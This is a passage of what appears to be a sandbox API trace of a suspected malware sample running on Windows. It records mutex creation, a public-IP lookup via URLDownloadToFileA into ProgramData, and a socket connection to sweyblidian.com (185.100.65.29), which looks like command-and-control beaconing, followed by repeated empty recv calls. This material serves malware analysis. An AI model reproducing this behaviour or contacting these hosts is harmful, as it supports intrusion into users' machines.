(lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x148 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x14c [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x150 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x154 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x158 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x15c [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x160 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x164 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x168 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x16c [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x170 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x174 [0164.741] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x178 [0164.741] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x17c [0164.741] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x180 [0164.741] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x184 [0164.741] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x188 [0164.741] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whoareyoutellmeandilltellwhoyou") returned 0x18c [0164.741] GetLastError () returned 0x0 [0164.741] GetUserDefaultLocaleName (in: lpLocaleName=0x27f72e, cchLocaleName=85 | out: lpLocaleName="en-US") returned 6 [0164.743] GetProcessHeap () returned 0x280000 [0164.743] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xc) returned 0x28f318 [0164.745] GetProcessHeap () returned 0x280000 [0164.745] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x5) returned 0x29a1c0 [0164.746] GetProcessHeap () returned 0x280000 [0164.746] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x28f318 | out: hHeap=0x280000) returned 1 [0164.748] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75c50000 [0164.748] LoadLibraryA (lpLibFileName="Urlmon.dll") returned 0x75770000 [0164.764] GetProcAddress (hModule=0x75770000, lpProcName="URLDownloadToFileA") returned 0x758068d0 [0164.766] GetProcessHeap () returned 0x280000 [0164.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xa) returned 0x29b3b0 [0164.766] GetProcessHeap () returned 0x280000 [0164.766] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29b3b0, Size=0x14) returned 0x29a1d0 [0164.766] GetProcessHeap () returned 0x280000 [0164.766] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29a1d0, Size=0x28) returned 0x29d798 [0164.766] CreateDirectoryW (lpPathName="C:\\ProgramData" (normalized: "c:\\programdata"), lpSecurityAttributes=0x0) returned 0 [0164.767] GetLastError () returned 0xb7 [0164.767] GetProcessHeap () returned 0x280000 [0164.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d798 | out: hHeap=0x280000) returned 1 [0164.768] URLDownloadToFileA (param_1=0x0, param_2="http://api.ipify.org/?format=xml", param_3="C:\\ProgramData\\kaosdma.txt" (normalized: "c:\\programdata\\kaosdma.txt"), param_4=0x0, param_5=0x0) returned 0x0 [0165.265] GetProcessHeap () returned 0x280000 [0165.265] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x10) returned 0x2c52d8 [0165.265] GetProcessHeap () returned 0x280000 [0165.265] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2c52d8, Size=0x20) returned 0x29fca8 [0165.265] GetProcessHeap () returned 0x280000 [0165.265] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29fca8, Size=0x40) returned 0x297a70 [0165.265] CreateFileW (lpFileName="C:\\ProgramData\\kaosdma.txt" (normalized: "c:\\programdata\\kaosdma.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0165.265] GetProcessHeap () returned 0x280000 [0165.266] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x297a70 | out: hHeap=0x280000) returned 1 [0165.267] GetProcessHeap () returned 0x280000 [0165.267] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x29fca8 [0165.268] ReadFile (in: hFile=0x210, lpBuffer=0x29fca8, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x27e3a4, lpOverlapped=0x0 | out: lpBuffer=0x29fca8*, lpNumberOfBytesRead=0x27e3a4*=0xc, lpOverlapped=0x0) returned 1 [0165.268] ReadFile (in: hFile=0x210, lpBuffer=0x29fcb4, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x27e3a4, lpOverlapped=0x0 | out: lpBuffer=0x29fcb4*, lpNumberOfBytesRead=0x27e3a4*=0x0, lpOverlapped=0x0) returned 1 [0165.270] CloseHandle (hObject=0x210) returned 1 [0165.270] GetProcessHeap () returned 0x280000 [0165.270] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29a1c0 | out: hHeap=0x280000) returned 1 [0165.271] GetProcessHeap () returned 0x280000 [0165.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x12) returned 0x29f0b0 [0165.271] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x27e0ac | out: lpWSAData=0x27e0ac) returned 0 [0165.271] GetProcessHeap () returned 0x280000 [0165.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x6) returned 0x2c0918 [0165.271] GetProcessHeap () returned 0x280000 [0165.271] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2c0918, Size=0xc) returned 0x2c52d8 [0165.271] GetProcessHeap () returned 0x280000 [0165.271] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2c52d8, Size=0x18) returned 0x29f0f0 [0165.271] GetProcessHeap () returned 0x280000 [0165.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x18) returned 0x29f110 [0165.272] GetModuleHandleW (lpModuleName="kernel32") returned 0x75c50000 [0165.272] GetProcAddress (hModule=0x75c50000, lpProcName="AcquireSRWLockExclusive") returned 0x775d29f1 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f110 | out: hHeap=0x280000) returned 1 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f0f0 | out: hHeap=0x280000) returned 1 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x6) returned 0x2c0918 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2c0918, Size=0xc) returned 0x2c52d8 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2c52d8, Size=0x18) returned 0x29f0f0 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x18) returned 0x29f110 [0165.272] GetModuleHandleW (lpModuleName="kernel32") returned 0x75c50000 [0165.272] GetProcAddress (hModule=0x75c50000, lpProcName="AcquireSRWLockExclusive") returned 0x775d29f1 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f110 | out: hHeap=0x280000) returned 1 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f0f0 | out: hHeap=0x280000) returned 1 [0165.272] GetProcessHeap () returned 0x280000 [0165.272] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xc) returned 0x2c52d8 [0165.272] GetProcessHeap () returned 0x280000 [0165.273] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x29fcd0 [0165.273] GetProcessHeap () returned 0x280000 [0165.273] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x6) returned 0x2c0918 [0165.273] GetProcessHeap () returned 0x280000 [0165.273] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2c0918, Size=0xc) returned 0x2c52f0 [0165.273] GetProcessHeap () returned 0x280000 [0165.273] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x2c52f0, Size=0x18) returned 0x29f0f0 [0165.273] GetProcessHeap () returned 0x280000 [0165.273] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x18) returned 0x29f110 [0165.273] GetModuleHandleW (lpModuleName="kernel32") returned 0x75c50000 [0165.273] GetProcAddress (hModule=0x75c50000, lpProcName="ReleaseSRWLockExclusive") returned 0x775d29ab [0165.273] GetProcessHeap () returned 0x280000 [0165.273] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f110 | out: hHeap=0x280000) returned 1 [0165.273] GetProcessHeap () returned 0x280000 [0165.273] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f0f0 | out: hHeap=0x280000) returned 1 [0165.273] GetProcessHeap () returned 0x280000 [0165.273] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x10) returned 0x2c52f0 [0165.273] getaddrinfo (in: pNodeName="sweyblidian.com", pServiceName=0x0, pHints=0x27e320*(ai_flags=0, ai_family=0, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x27e300 | out: ppResult=0x27e300*=0x29fc80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2c5320*(sa_family=2, sin_port=0x0, sin_addr="185.100.65.29"), ai_next=0x0)) returned 0 [0166.535] GetProcessHeap () returned 0x280000 [0166.535] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2c52f0 | out: hHeap=0x280000) returned 1 [0166.535] GetProcessHeap () returned 0x280000 [0166.535] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x2c8168 [0166.540] FreeAddrInfoW (pAddrInfo=0x29fc80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2c5320*(sa_family=2, sin_port=0x0, sin_addr="185.100.65.29"), ai_next=0x0)) [0166.540] WSASocketW (af=2, type=1, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x81) returned 0x434 [0166.540] connect (s=0x434, name=0x27e2c4*(sa_family=2, sin_port=0x50, sin_addr="185.100.65.29"), namelen=16) returned 0 [0166.662] GetProcessHeap () returned 0x280000 [0166.662] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2c8168 | out: hHeap=0x280000) returned 1 [0166.662] GetProcessHeap () returned 0x280000 [0166.662] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f0b0 | out: hHeap=0x280000) returned 1 [0166.662] GetProcessHeap () returned 0x280000 [0166.662] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x12) returned 0x29f0b0 [0166.662] setsockopt (s=0x434, level=6, optname=1, optval="\x01ð)", optlen=1) returned 0 [0166.663] ioctlsocket (in: s=0x434, cmd=-2147195266, argp=0x27e320 | out: argp=0x27e320) returned 0 [0166.663] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.786] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.787] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.788] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.789] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.790] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.791] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: 